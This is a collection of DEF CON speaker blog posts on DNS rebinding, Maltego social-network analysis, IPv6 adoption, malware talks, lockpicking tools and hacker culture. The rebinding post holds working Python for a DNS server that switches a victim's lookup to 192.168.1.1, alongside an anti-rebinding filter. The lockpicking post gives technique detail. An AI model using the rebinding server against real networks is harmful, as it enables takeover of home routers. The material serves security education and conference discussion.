To understand DNS rebinding, let's examine why DNS rebinding is needed in the first place: the same-origin policy (often loosely called the same domain policy). The same-origin policy is a security policy that is enforced by your Web browser. That policy states that if you browse to http://www.evilhacker.com/, then that page from www.evilhacker.com can tell your Web browser to load content from other Web sites (images, JavaScript, CSS, iframes, etc), but it cannot see the responses from those Web sites nor access the content that is returned by those Web sites. In other words, JavaScript from www.evilhacker.com can only read content from www.evilhacker.com because that content comes from the same origin. This is a good thing, as you wouldn't want some JavaScript from www.evilhacker.com making unauthorized XmlHttpRequests to Web sites inside your local network or elsewhere and reading the replies.

The problem with this policy is that computers don't use domain names to communicate with each other; they use IP addresses. The idea behind DNS rebinding is:

1) Get the victim to load some JavaScript from www.evilhacker.com.
2) Convince the victim's browser that www.evilhacker.com has moved to a different IP address, say, 192.168.1.1.
3) Evil hacker's JavaScript is free to interact with www.evilhacker.com, which the browser now thinks is located at 192.168.1.1.

The difficult part in the above attack is convincing the victim's browser to switch IP addresses. Various methods of achieving this have been presented in the past, so why yet another talk on DNS rebinding attacks? Because quite simply, the common DNS rebinding attacks that have been discussed in the past are either not practical or simply no longer work:

o Setting low TTL values in DNS responses doesn't work anymore because of DNS pinning.
o Anti-DNS pinning attacks only work in older browsers (IE6/7, FF2.x), and even then the rebinding attack takes between 15 and 120 seconds to take effect depending on the victim's browser.
o The "multiple A record" technique can no longer be used to rebind to internal (RFC1918) IP addresses.
o In addition to browsers, third party plug-ins such as Flash and Java have implemented anti-rebinding measures.

Thanks to several features present in many popular routers and their underlying operating systems*, none of this will deter the attack discussed in this talk, which has been tested against live networks under real-world scenarios (with the appropriate permissions from the network owners, naturally). Common anti-DNS rebinding protections offered by services such as dnsmasq, OpenDNS and NoScript will not prevent this attack, nor will changing the router's internal IP address. The good news is that there are fixes that can be made by both vendors and end users to protect against this attack*. The bad news is that these are fixes that should have been implemented years ago, but instead have been ignored by both vendors and users alike.
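The following is an added example, not the talk's tool and not code from the original post: a tiny stateful authoritative DNS server that performs the rebinding switch from the three steps above (first lookup returns the attacker's real host so the page and its JavaScript load, every later lookup from the same resolver returns 192.168.1.1, with TTL 0), alongside the kind of RFC 1918 answer filter that dnsmasq-style anti-rebinding protection applies. The attacker's public address (198.51.100.10, a documentation range) and the victim resolver address are assumptions; www.evilhacker.com and 192.168.1.1 are taken from the text.

```python
# Added example (not the talk's tool or any code from the page): a stateful
# DNS responder that performs the rebinding switch from the three steps above,
# and the private-address answer filter that dnsmasq-style anti-rebinding
# protections apply. ATTACKER_PUBLIC_IP and the client address used in main
# are illustrative assumptions; the domain and 192.168.1.1 are from the text.
import ipaddress
import struct

ATTACKER_DOMAIN = "www.evilhacker.com"   # from the text
ATTACKER_PUBLIC_IP = "198.51.100.10"     # assumption: RFC 5737 documentation address
TARGET_PRIVATE_IP = "192.168.1.1"        # the router's LAN address from the text

# RFC 1918 ranges plus loopback: what a rebinding filter refuses to hand a browser
RFC1918_AND_LOOPBACK = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
]


def build_query(name, txid=0x1234):
    """Build a minimal DNS query for an A record of `name` (one question, RD set)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_question_name(query):
    """Read the QNAME of the first question out of a DNS query packet."""
    pos, labels = 12, []  # the fixed header is 12 bytes
    while query[pos] != 0:
        length = query[pos]
        labels.append(query[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels).lower()


def build_a_response(query, ip, ttl=0):
    """Answer `query` with one A record. TTL 0 is the classic low-TTL rebinding knob."""
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]  # echo the question section back (single-question query)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1, RD=1, RA=1, 1 answer
    # 0xC00C is a compression pointer to the name at offset 12 (the question's QNAME)
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
    return header + question + rr


def parse_answer_ip(response):
    """Pull the IPv4 address out of the single A record build_a_response appends."""
    return str(ipaddress.IPv4Address(response[-4:]))


class RebindingResolver:
    """Authoritative server for the attacker's domain that remembers each resolver
    it has seen. The first lookup returns the real attacker host so the page and
    its JavaScript load (step 1); every later lookup returns the LAN target
    (step 2), after which same-origin JavaScript reaches the router (step 3)."""

    def __init__(self, domain, public_ip, private_ip):
        self.domain = domain.lower()
        self.public_ip = public_ip
        self.private_ip = private_ip
        self.seen = set()

    def answer_ip(self, client, name):
        if name != self.domain:
            return None  # not our zone; a real server would answer NXDOMAIN/REFUSED
        if client in self.seen:
            return self.private_ip
        self.seen.add(client)
        return self.public_ip

    def respond(self, client, query):
        ip = self.answer_ip(client, parse_question_name(query))
        return None if ip is None else build_a_response(query, ip, ttl=0)


def is_rebind_to_private(answer_ip):
    """The check a dnsmasq-style stop-dns-rebind option makes: an upstream answer
    for a public name that points into RFC 1918 or loopback space is dropped.
    The text notes this alone does not stop the variant presented in the talk."""
    addr = ipaddress.IPv4Address(answer_ip)
    return any(addr in net for net in RFC1918_AND_LOOPBACK)


if __name__ == "__main__":
    server = RebindingResolver(ATTACKER_DOMAIN, ATTACKER_PUBLIC_IP, TARGET_PRIVATE_IP)
    victim_resolver = "10.0.0.53"  # assumption: the victim's resolver as seen by the server
    first = server.respond(victim_resolver, build_query(ATTACKER_DOMAIN))
    second = server.respond(victim_resolver, build_query(ATTACKER_DOMAIN))
    for resp in (first, second):
        ip = parse_answer_ip(resp)
        print(ip, "filtered" if is_rebind_to_private(ip) else "allowed")
```

Run it and the first answer is the public host (allowed by the filter), the second is 192.168.1.1 (the one a stop-dns-rebind style filter drops). Keying the switch on the resolver address rather than on a timer is what makes the swap deterministic; a real deployment also has to survive the resolver-side caching and pinning behaviours the bullet list above describes, which is exactly the part the talk leaves for the stage.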

Of course, what is a talk without a tool release? I will be demoing and releasing a tool that automates the entire attack and extends the target router's internal Web interface out to an external Web site where the attacker can access and browse the router's Web pages in real time, just as if he were sitting on the LAN himself. All the attacker needs is a user inside the target network to browse to the attacker's Web site. It's point-and-click hacking goodness that's fun for the whole family!

* To be discussed in more detail at the talk!

"Hey, maybe I've got a DEF CON talk emerging here"
Experiences of a first time DEF CON speaker (Part I)

"...I've seen this mentioned on another website, but one of the best ways to meet people is to do a talk..." … and so begins this short summary of my experience (up to now) as a first time DEF CON speaker, what I like about DEF CON, how I got involved, submitting a talk and just what is it I'll be talking about anyway….

Local DEF CON chapters, a serendipitous meeting
On the way home from DEF CON 15 I got chatting to another con goer, alien (@alien8 on twitter), a DEF CON Goon. alien told me to check out DC4420, the London, UK DEF CON chapter…so about 2 years later I went along.

DC4420- Community
DC4420 is excellent. Each month a group of 50-80 hacker/geek types get together, typically for two talks, a tech talk and a fun/lower-tech talk. There's also plenty of opportunity to chat with folks…

…I've seen this mentioned on another website, but one of the best ways to meet people is to do a talk. Talking, or even just sharing what you're working on can lead to discussions with others who are tackling the same challenge or have complementary knowledge and skills.

I let alien know I had a talk about "teaching my dad to be safe online" and before I knew it, I was talking at DC4420. Well, this had a knock on effect of people talking to me about what I was doing in the local village community.

Through that one talk, I got chatting to some seriously smart people at DC4420 (far smarter than I'll ever be). I've had discussion and help on a number of topics (non-work related, for the record) and also shared my learnings with others. Ultimately, this is what a community is about and I love being part of it.

That's all fine, but what the heck does this have to do with my DEF CON talk?

Seemingly Random Sequence of Events
Well, after DEF CON 17 I decided to start using Twitter (hey! It's actually pretty useful). Among the first people I followed were @_DEF CON_, @RyanlRussell and @tonyhawk (yes, the skateboard legend).

Tony was looking for volunteers to help in a worldwide twitter hunt. A what? A 'Twitter Hunt'. Tony is well known on twitter for randomly hiding skateboards, bmx's and other cool stuff, then sending out a clue (via twitter), so his tweeps can hunt down the schwag….

…so I volunteered, and to my amazement, I got selected to help (I'm nearly 40, married, with child, I shouldn't be this excited about a skateboard legend). His event involved close to 100 decks being hidden around the world with clues being sent out for locations as far apart as Sydney Australia, London UK and Boise Idaho.

And?
And I wanted to see a Google map with pictures of the people who hid the decks, the people who found them and the schwag. That's where my adventure started.

I sent out a tweet asking if anyone knew of a quick way to grab tweets between dates and pretty quickly I got a response from a fellow DC4420er going by the name of @l0sthighway (he's a smashing chap). He suggested I use Maltego (check out the community edition).

So, in about a month I went from no knowledge of Twitter or Maltego, to using Maltego, together with some dreadful PERL scripts to call the Twitter API. I had a bucket load of help from the wider community, including the Maltego creators, Roelof Temmingh and Andrew Mowhawk and of course a few folks from DC4420.

I wrote up some of my adventure and left it at that (new born child in the house and all that).

Charity
Just after the earthquake in Haiti, I spotted a tweet from DECappeal (the UK disaster umbrella charity). They wanted to gather stats on social media… well, I now knew a thing or two about this, so I sent them a tweet. A series of calls with DECappeal and British Red Cross later and I was collecting twitter stats for them and generating graphs.

Nigerian Scammer Networks
In late 2009/early 2010 a friend was on the wrong end of a Nigerian scam. Well, I just thought I'd have a poke around with Maltego and see if it could, theoretically, help identify anything interesting. Well, it got very interesting…

Hey, maybe I've got a DEF CON talk emerging here?
I chatted to alien about the potential content, who asked if l0sthighway and I would like to talk at the DC4420 meeting that coincides with Infosec Europe (the UK's big infosec show). Wow, that's like a big deal.

Although a watered down version of the intended DEF CON talk, it seemed to capture the interest of a number of people… so I figured I'd go ahead and submit a paper…what's the worst that could happen?

Call For Papers – Notes from the field
Well, I pinged Twitter looking for people who'd be interested in pointing me in the right direction with my CFP. Dave Rook (@securityninja) , Jayson Street (@jaysonstreet) , Rafal Los (@Rafallos) and alien (@alien8) all sent offers of help…They helped me transform my idea into a talk worthy of con-consideration.

My starting title, although reflective of the talk, was certainly not sufficiently "DEF CON", so I went through a few iterations, ending up with "Social Networking Special Ops: Extending data visualization tools for faster pwnage" (…closer).

My major observations are:

1. Creating a compelling title isn't as easy as it sounds.
2. Creating a CFP entry takes a good deal of time.
3. Get people to critically review your entry. I suggest people who've been accepted previously.
4. It helps if you've got a detailed outline of your talk and other supporting material (slideware, whitepapers etc).
5. If I ever submit again, I'll be getting my paper in sooner.
6. It's nail biting waiting to hear the outcome.

Well, to my amazement, I got accepted to speak. WOAH!...

So what's the talk about?
In a one sentence summary.

"my talk describes how data visualization tools (like Maltego) can be extended to speed up the analysis of social networks (well, anything really)".

The talk is delivered in 3 parts.

Part 1.
I start with an intro about social network analysis, how there's an explosion of personal data available online and why this presents both a problem and an opportunity. I figured most folks have some idea about this, so I don't spend a lot of time here, but I will call out research/work in this field.

Part 2.
I share how you can use visualization software, and in this case Maltego, to data mine social networks. I focus on Twitter, based on my experiences with the Tony Hawk Twitter Hunt. BTW. I'm also running the DEF CON Twitter Hunt so you can all share the fun of a twitter hunt. Thanks to the generosity of Tony Hawk, I've got a limited number of his decks (signed) to give away too.

The Tony Hawk angle is intended to be a fun and light hearted way to introduce Maltego, but what about something more interesting?

Part 3.
This section talks about my experience enumerating a Nigerian scam ring. I share what I've learned about Nigerian scammer operations; for instance,…

• Did you know there are hundreds of worldwide "cells" (62 in the UK alone) ?
• Have you any idea how much a Yahoozee (Nigerian scammer) makes?
• Have you seen what they post on social networks?

I'll share how I found this stuff out, using data visualization and techniques in social network analysis inspired by previous talks including "Satan is on my friends list" and "Social Zombies".

By the end of the talk I hope to leave the audience with an appreciation of work/research/tools in social network analysis and data visualization. I also hope to expose the audience to ideas that they can apply in different contexts. In short, I want to generate the same level of interest that sparks and motivates me when I go to a DEF CON talk.

What next
Well…

1. Come along to my talk at DEF CON on Sunday at 4pm (I'm also at Blackhat and Bsides).
2. Get on Twitter and get ready for the DEF CON Twitter Hunt.
I'm honored and excited to be able to talk and be actively involved with this year's con. If you want to say hi, send me a tweet or ping me on the forums.

…and yes. I'm bricking it a little bit… who wouldn't be ;-)


ARIN and IPv6 at DEF CON

"...The rebirth of the Internet is imminent, and it begins with the depletion of IPv4 and the rise of IPv6..." I've been lucky enough to witness some pretty remarkable events during my career in information technology. I witnessed the rise of the Internet first hand. Then I watched as the Internet and IPv4 made IPX, Banyan Vines, and other protocols obsolete. I was there for Y2K - a lot of money and effort went into what amounted to a non-event for most enterprises. I watched as my portfolio crumbled when the dot com bubble burst. I worked at several companies that were victims of bad management and bad luck during that time. I've seen a lot of change in this industry, and yet, I think we're just getting started. The real boom is about to begin and with it comes great change.

We're on the cusp of the greatest change I am likely to witness in my career. The rebirth of the Internet is imminent, and it begins with the depletion of IPv4 and the rise of IPv6. IPv6 heralds a new age for the Internet. We'll finally realize the potential of the Internet as it was originally conceived; a huge network of inter-connected devices with real end to end connectivity. The ability to globally address every single connected device will change the way the Internet looks, the way it works, the way we work, the way we play, and the way we communicate.

Today's Internet has been a dry run for what will become the Internet for many generations far into the future. The new Internet will do things we cannot imagine today and will likely be unrecognizable to those of us that work on it today. The proliferation of IPv6 will bring about a mature information age and many new technologies and opportunities.

With great change often comes great turmoil. I expect the Internet to experience some growing pains during this transition. Rather than a soft landing, we appear poised to hit the wall at mach 3 and the result will forever alter the Internet.

The issue is simple: IPv4 addresses are running out, and fast – only 6.25% of the IPv4 free pool remains, and the rest is going quickly. Some companies have been slow to adopt IPv6 for various reasons, including the associated time, cost, and risks. But with IPv4 depletion imminent, more and more of the Internet will use IPv6, meaning we must run both IPv4 and IPv6 simultaneously. Dual-stacking means everyone can see our websites, use our web-based services, and communicate with us.

IPv6 is now a key feature that customers are looking for, and companies who offer it will have a significant advantage. Now is the time to request IPv6 addresses from ARIN or your appropriate Regional Internet Registry (RIR) (https://www.arin.net/resources/request.html) and start providing your customers with IPv6 connectivity in addition to IPv4.

On Sunday, August 1, John Curran, ARIN's President and CEO, and I, ARIN's Network Operations Manager, will lead discussions on IPv6 at this year's DEF CON.

John's session {IPv6: No Longer Optional, Sunday, August 1, at 11:00am} will describe the key considerations for and benefits of IPv6 adoption and the steps all network operators and engineers should take to prepare for IPv4 depletion challenges. John will review regional and global IPv4 depletion and IPv6 adoption statistics, address allocation trends, and the IPv6 educational resources available to help you prepare.

In my talk, {Implementing IPv6 at ARIN, Sunday, August 1, at 1:00pm}, I will provide details of ARIN's own deployment of IPv6, and will include information about getting IPv6 transit, configuring hardware and software, and using off the shelf tools to ease the transition. I will also talk about security best practices related to IPv6 deployment.

If you cannot attend the session, but are looking to learn more about IPv6, you can visit www.arin.net or www.getIPv6.info for more information.

Packing It All In

"...leave plenty of room to take a chance and be enchanted by someone or a topic you have little exposure to..." This year, I am extremely fortunate to have been selected to speak twice.

The first talk I will give is on Android Rootkits. This talk is being given with one of my colleagues from London, Christian G. Papathanasiou (@h0h0_). We tried to make this a great talk for both new comers and veterans. If you are interested, come check it out. It is going to be a lot of fun!

The second talk is Malware Freakshow 2 — a continuation of the talk I gave at DEF CON 17. Again, this year, I am giving it with Jibran Ilyas (@jibranilyas). Last year, we spent a lot of time focused on the various environments that were compromised by malware and just a little bit of time on the actual malware demos. This year, we flipped it around. We found some really interesting advances were made over the last year, so a good portion of the talk is the live malware demos. (Yes, they are going to be done LIVE. If anyone out there has a direct line to the demo gods, please put a good word in for us!)

If this is your first time attending DEF CON, it can be very difficult to figure out what to do. I put together a few pointers. Hopefully, a few of these will help you make the most of your journey at the end of July.

The Talks
This year there are more talk choices than ever for attendees. The number of great talks is incredible. Some of the best talks I have seen were NOT the ones that had hype, whether by person or topic, associated with them. By all means, attend the popular talks, but leave plenty of room to take a chance and be enchanted by someone or a topic you have little exposure to. You might learn something that motivates you to do something great (or not). Keep in mind you are not going to be able to see even a fraction of the talks this year, so choose wisely.

The Contests
I have personally never competed in a contest at DEF CON, but I have many friends who do year after year. Some do well and some crash and burn, but I have heard many rewarding and interesting stories by those who have competed. The amount of time you are willing to commit is a big factor here. If you are thinking you are going to attend a ton of talks and also compete in 10 events, think again. If competing is your thing, go for it!!

The Parties
Catching up with old friends and making new contacts is one of the best parts of DEF CON. Many of the people I have met at DEF CON over the years, I still keep in touch with. A handful of those people I actually work with every day.

There are many public and private parties at DEF CON. Use your contacts to find out where to be after hours. If you don't know anyone, like the boat I was in back in 2000, meet and talk to people during the day and find out where they are going and what they are doing at night. For many events, you need to be invited or have some sort of token or ticket to get in. If you just tag along with a group of people who are going to a party with hopes that the guy at the door will take a liking to you, you will be disappointed. It is his job to keep you out. Whatever you do, don't name drop at the door. Hackers validate. There are also many public parties and events that are going on during the con that are likely much more hospitable than 194 sweaty guys and 6 girls stuffed into a skybox. Don't be a wallflower.

The Aftermath
Whether this is your first DEF CON or your eighteenth, allow yourself some time to decompress and then act upon what you learned or experienced. When it is all said and done and you are lying on the floor of McCarran Airport waiting for your flight to board, make a mental note to spend some time thinking about the things you learned and the people you met. Don't forget to keep in touch with all the great people you met; you never know where those contacts will lead you. Finally, if any of those talks sparked your interest, get involved and contribute to one of the most intelligent and creative communities on the planet.

---

What's This Lockpick For?

"Important note: Much of this is merely my opinion. My incredibly accurate opinion."

Among the first questions you hear when teaching anyone to pick a lock is some variant of "What is this pick for?" I've heard it a dozen ways: "Which one should I use for this lock?", "Which one will open it fastest?" and "How does this one work?" I know that answering this question in print won't keep me from having to answer it a million more times, but at the very least it will help me collect my thoughts and hopefully serve as a primer to new pickers who come across it.

Important note: Much of this is merely my opinion. My incredibly accurate opinion.

Rakes, Hooks & Profile picks, oh my!

There are three major categories of lock picks. Rakes typically consist of multiple sharp or flowing curves and are meant to manipulate multiple pins at once. Hooks are just the opposite, consisting of a single point, though there is a great deal of variety in how that point is designed. Hooks are meant to manipulate a single pin at a time. Profile picks are all sharp angles and may seem completely random at first blush. These are designed to recreate the profile of the key with minimal manipulation.

There are outliers that don't fall into the three main groups. Of those, most important are the diamond & ball picks. I'll cover those in depth. Depending on how quickly I put together the rest of this material I may cover more esoteric tools meant for specific locking concepts. We'll see!

Hooks

The first tool many pickers will use is your basic medium hook. This is a perfect beginner tool because it's a bit clunky inside the lock, doesn't require a great deal of skill to get the best use out of it, but in its simplicity it remains very effective and often enjoys a place in the primary kit of any picker as their skill advances to the intermediate stage.

Medium Hook

To best describe the medium hook's limitations, I'll explain the advantages of the Gonzo, so called because the head looks a bit like the nose of Gonzo the Great. Unlike the m.hook, the Gonzo has a rounded tip, allowing it to move more smoothly through the lock. Also, the tip extends just a bit higher than the m.hook, allowing it to better manipulate tricky high-low bittings. The Gonzo is beloved among many, if not most, advanced pickers and has taken the place of the m.hook in their primary kits.

Long Hook

The Long Hook is a bear. It is difficult to move through many keyways, can get caught inside the lock mid-pick and is generally just uncomfortable to work with. However, the extreme tip that causes all of those problems also allows it to set the most ridiculous high-low bittings. Though this pick rarely sees regular use, it has proved itself invaluable once or twice, and so many pickers will keep it around, just in case.

Deep Curve

The deep curve is the most widely borrowed member of a family of tools built around a specific method of picking. Personally, I've never cared for the Falle method of progressive curves, but there are people I respect a great deal who swear by it, so I'll leave it to them to fill you in. The deep curve, regardless of how I feel about the larger system, is an excellent tool. By allowing the belly of the curve to run along a low point in the keyway & rocking the pick into the lock, following the line of the pick head, you get a great sense of control and can easily manipulate difficult-to-reach pins in the back of the lock.

Notch Hook

The most common notched hooks tend to fall, in height, somewhere between the m.hook & the l.hook. However, you can carve a notch into any pick you like and enjoy the benefits. Simply, the notch makes it easy to locate each pin inside the lock, and in the rare situation where heavier-than-normal force is required you don't risk slipping off of the pin you are working on as you would with the Gonzo or m.hook. Finally, in locks with oddly shaped pins, such as Medeco's chisel tips, the notched hook allows you to manipulate them in more specific ways, such as rotating them.

Deforest Diamond

I do not know Deforest's first name, though I've heard someone say it before. These days the picks named for him are more likely to be known as an "offset diamond" and "offset ball," but where possible I'll try to give these picks what I consider their proper names. The Deforest diamond is typically my second pick in a lock, right after the Bogota, which I'll cover in the rakes section. The angled tip of these picks gives the Deforest deeper reach than your typical hooks, and the added shape to the tip, whether ball or diamond, allows you some additional manipulation options. My primary use of the Deforest is to defeat the previously mentioned high-low bittings. The Deforest moves through a lock with ease, unlike the l.hook, and can set the more extreme high-lows that the Gonzo can't quite reach. Though you will rarely find them in starter sets, a Deforest should be one of the first picks you make or acquire after you get comfortable with your initial tools.

There are other hooks and other single pin picks that straddle the line between hook and something else, but by the time you come across them, you'll be able to deduce their function.

Rakes

I'm probably going to start some fights when I discuss rakes. I will be the first to admit that my tastes are sometimes non-standard, but I've tried countless tools and opened a lot of locks, so trust me. Then, when you find out I'm completely wrong and you don't open any locks, you'll have learned a valuable lesson about trusting experts on the internet.

C Rake

I'll begin with the ever-popular "snake rake" or "C" rake. This diminutive, narrow-profiled rake, found without fail in every starter set a new picker buys, is all but useless against decent locks. It will pop Master #3s like magic. It will stun and amaze and eventually, once you learn to use and love the other tools on this list, fall into disfavor and out of your primary kit.

Large S Rake

Much more interesting is the Large S. When I first saw this tool I was told it was the German secret weapon. "Push, Push, Open!" my Dutch friend declared. I bought one immediately and found great success with it. The Large S is able to set more varied bittings than the C or the S.

S Rake

The S rake is loved by a lot of people. I don't really tolerate it well and as such I'm probably not the person to describe its best use. So I'm not going to! Ask almost any other competent picker, though, and I'm sure they can tell you why they like it. One note: this is a very common rake in starter sets and typically the first pick to break on a heavy-handed newbie picker.

L Rake

The L rake, however, I love. The L is the only rake I buy in bulk for classes and workshops. The most common profile you will find for an L rake is pretty timid, but can still do the job. While this pick will open a decent number of locks, I've found its best use is in setting 7-9 cut pins. Apply light tension & rake low in the keyway to set the longest pins in the lock, then increase your tension a little bit as you go back in with a Gonzo or Deforest diamond to finish the lock off. A basic, but very effective, speed picking strategy. These aren't easy picks to make by hand, but it can be well worth it so you can craft a more aggressive profile.

Bogota

Most important in this list is the Bogota. Sole creation of Raimundo, this pick has been poorly reproduced by many of the major manufacturers in the last 3 years. Unfortunately for the people buying the knockoffs, you can't just stick a Bogota rake on a popsicle-stick handle and expect it to work its magic. Lacking the thin, bent handle of the traditional Bogota, they have dramatically reduced the efficacy of the pick. I cannot overstate the ludicrous quality of a well-made Bogota rake. NKT, a British competitor at the Dutch Open (now LockCon) in Sneek, NL, made it to the final table using nothing more than a set of Bogota rakes and popped one of the final round locks in 3 seconds as well. They double as tension wrenches, which is why they come in pairs. The basic method is to hold the rake like a trigger and "Shake like you've had too much coffee." Silly as it sounds, it works. Personally, I've developed a slightly different technique over the years, but still, it would not work without the bent handle. The Bogota is the only rake on this list that allows me to get a quick topography of the lock with a few simple swipes. Bogota + Deforest Diamond is how I won my Black Badge.

W Rake

Then there's the W rake. The l.hook of the rake world. This unwieldy, aggressive rake is sure to get bound up in the back of your lock, and its thin connection between shaft and pick head means it will bend and break with heavy-handed use. However, just like the l.hook, it has proved itself by opening a tricky lock, if rarely, and thus remains in use today. Sometimes the ugly, odd and downright fragile picks will open the locks we can't get at otherwise, which brings us to...

Profile Picks

Unfortunately, I'm exhausted! So, I'll cover Profile Picks, Diamonds, balls & some of the more esoteric tools like Matadors and cruciform picks in a few days.

-Schuyler Towne

Kill Yr Idols

"You are not, in fact, a Hacker Superhero"

I didn't talk to a soul for more than five minutes for the first three DEF CONs I went to.

I suppose I've been both a part of, and very much outside of, the "hacker scene" for a long time now. I grew up around punk rock: MaximumRockNRoll, all ages shows, a detached coolness and an unspoken set of rules and regulations that everyone knew somehow anyway, whether instinctively (for the kids who somehow Just Fit In, seemingly without trying), or learned (in my case) from subtle slights and ridicule, a silent but nonetheless rigid set of boundaries that defined what seven inches you bought (or admitted to buying), the width and specific colors and patterns of your braces, the strategic locations of which patches you had on your flight jacket and where.

Along with the punk scene, there was another I suppose I belonged to, or wanted to belong to as well, one I rarely admitted around my punk and skin friends: the world (back then) on boards and the right IRC channels, of quietly traded docs and warez and .NF0 files that mostly said very little but had that same beautiful and tragic optimism of my punk zines, the idea that all of us (somehow) could be more interesting than the sum of our parts, whether our salvation was some nebulous abstraction called Rock and Roll or another equally impenetrable abstraction called Hacking.

To me, going to my first DEF CON was a lot like going to my first punk rock show. I had a general idea of what to expect, had done a lot of my homework, knew the right words to say, had the right t-shirt, and mostly spent lots of time getting shunned, rated, shut down, and dismissed.

At punk shows, you could practice your game every week until you got it down. At DEF CON, and really just about nowhere else, you only get to try to figure out the social puzzle for a few days, and then try again next year. It's a long process, and one that turns a lot of people off. Yes, it keeps getting bigger, and yes, a lot of the same people come back every year, but I'd wager another equal number come once, can't figure out how things work, and never come again.

I'm really not bitter, I swear to you. If I was, I wouldn't have kept coming for ten years. I love DEF CON. I am a loyal DEF CON defender, I always show up early and leave late, and I even (OH NO HE DIDN'T! AWWW HELL NAW) like the Riv. I do. Sorry.

But seriously -- DEF CON people, all of you, need to stop taking yourselves so freaking seriously.

Point of order:

You are not, in fact, a Hacker Superhero. If you are reading this and are (in fact) a Hacker Superhero, my sincerest apologies. But for the vast majority of you reading this, you're not. You're just not.

And that's okay. You probably are really good at *something*, and are probably smarter than the average bear, otherwise you most likely wouldn't be bothering to come to DEF CON, more often than not on your own dime. Still, letting go of the idea that you're a REALLY BIG HIGHFALUTIN' GOSHDARNED DEAL will go a long way toward the two of us having a drink and a nice chat, and potentially one or both of us learning a thing or two. That "I Am A Serious And Unmitigated Total BadAss" vibe you're putting out? Not really that helpful, sorry. Let's drop it, and I'll front you a Tanqueray and tonic.

Another point of order:

Those people behind the podium, or running your favorite event, are not, actually, Hacker Superheroes either. No, seriously, they're not. Some of them are really, really, ridiculously smart. A larger number of them are really, really good at marketing. But NONE of them are superhuman. They're just people. Passionate people, sure. A particular flavor of people that are the exact reason we all get together at these shindigs year in and year out, sure.

But guess what? They're vain. They're neurotic. They have annoying nervous tics. They will talk to you about their cats and their favorite houseplants, they will have pieces of their lunch stuck between their teeth, and once you finish your tedious fawning about how great Bug X, Talk Y, or Book Z was, they will stare at your shoes, you will mumble something about the weather, and then some other fan(boy|girl) will come up and give them a bear hug and a high five and start fawning again, and neither of you will be any better off than when you started.

My point? I guess that we all need to forget the mythology. We need to forget the mythology we make around the supposed "stars" of our merry little band (ProTip: There's no such thing as a famous hacker -- Justin Bieber is famous, Johnny Long is a guy who was on CNN one time), and we need to forget the mythology we are all so desperately trying to make for ourselves. If you can get past all of that, past all the bullshit, simulacra, posturing, scenewhoring, smack-talking, and (nowadays) industry autofellatio, you will actually have a really good time at DEF CON, or at least I always do.

Here's how I go about doing that, what I finally figured out in my fourth year at con.

I talk to people. And I make other people talk to each other.

I'm not good at it, I'm really not. I forget names. I don't do small talk. I stutter sometimes and repeat myself. I interrupt a lot. I spit when I get excited. But for three days every year, at DEF CON, I do it anyway.

I grab random people who look like they're not interacting, and I make them interact, often against their will. If someone is a dick, I keep trying anyway. Alcohol seems to help.

I especially try to make people who look like they wouldn't do so under any reasonably sane set of circumstances get engaged in conversations. Feds and homeless people, blackhats and those Jesus Hacker guys, overdressed gothy glam-rockers and hyper-hetero Polish weightlifter types, those Korean CTF people with matching t-shirts and haircuts and well, whoever. I collect invites to SUPERELITEOMGPRIV8R00MPARTIES and give them to quiet kids who don't know anyone and would never get invited. I'm particularly proud of dragging Hovav Shacham's grad students to StripperCon two years ago. That was pretty epic.

In other words, I guess the way I keep sane and have fun at DEF CON is basically to spend every moment I can doing what no one (seriously, NO ONE) did for me those first three years: welcoming people to this thing we call "The Scene", and generally trying not to be a dick.

You should too. See you at con.

Trying to Be a Wise Man at DEF CON

"The smart man learns from his mistakes. The wise man learns from the mistakes of others." - Anonymous
I try very hard to share wisdom that I have learned from others, but I also feel it is sometimes good to share my mistakes so others can be the wiser. With that in mind, let me take you back to DEF CON 12. It was my first time at DEF CON; thankfully, even after my EPIC fail, it was not my last. I went to my first DEF CON with all these notions on how it was supposed to be. The people were all hackers and uber leet; you had to look weird to stand out (yes, I spray painted my hair blue & yes, to my chagrin, there are pics online). All these people wanted to hang out with you and share what they knew and to hear what you had to say.

So in other words, I went to DEF CON not really knowing what DEF CON was about. I did learn quite a lot my first time (most of it the hard way). I learned that DEF CON is what you make of it. If you want a place to just party with people who look and think like you, then you will be happy. If you are looking for a place to learn hands-on with some of the brightest people on the planet, good news, you will. If you go to DEF CON knowing what it will be and expecting it to conform to your ideals, then you, my friend, will be sorely disappointed. DEF CON does not conform to one's ideals; it is a place where we all learn to accept other points of reference.

That was my epic fail: I went thinking my way was how DEF CON was supposed to be, not willing to open myself to all the other opportunities that the event had to offer. My first time there I met H D Moore, Tony Watson, Kevin Mitnick, Rain Forest Puppy, FX and the Woz. So what? I didn't stop to really learn from them; I thrust my camera in their faces to get a picture with some of my heroes. What I could have done was turn the dial down from 22 to maybe 6, then listen and converse with them. For you see, they would have talked with me, stupid blue hair and all. Not because I was an author or a DEF CON speaker, for I was neither. No, they would have spoken with me if I were willing to listen, because they knew what DEF CON was really about: it is a place to share information and to learn from others.

I learned that lesson and I hope you learn it from me so you don't experience it first hand. Be yourself, not what you think people are expecting. Feel free to go up to the speakers to ask them questions; if they are not too busy or anxious getting ready for their talk, they will most likely take time to talk to you. Do not waste that opportunity just for a picture. Talk to them as well as listen to what they have to say, and start a friendship that will last longer than the picture taken.

Remember, DEF CON at its core is a hacker conference; sometimes, though, we forget the true meaning of that. Adam Laurie shared with me the DEF CON ethos: "If you know something, share it. If you learn something, learn more. When you really know your stuff, teach it." That is what a hacker conference should be all about.

This also brings to mind another question we tend to ask ourselves in the INFOSEC/Hacking community. Do you know what a hacker really is? The easy answers are not always the right answers. A hacker is more than the faceless nameless person behind that email you just opened (please don't click that link!).

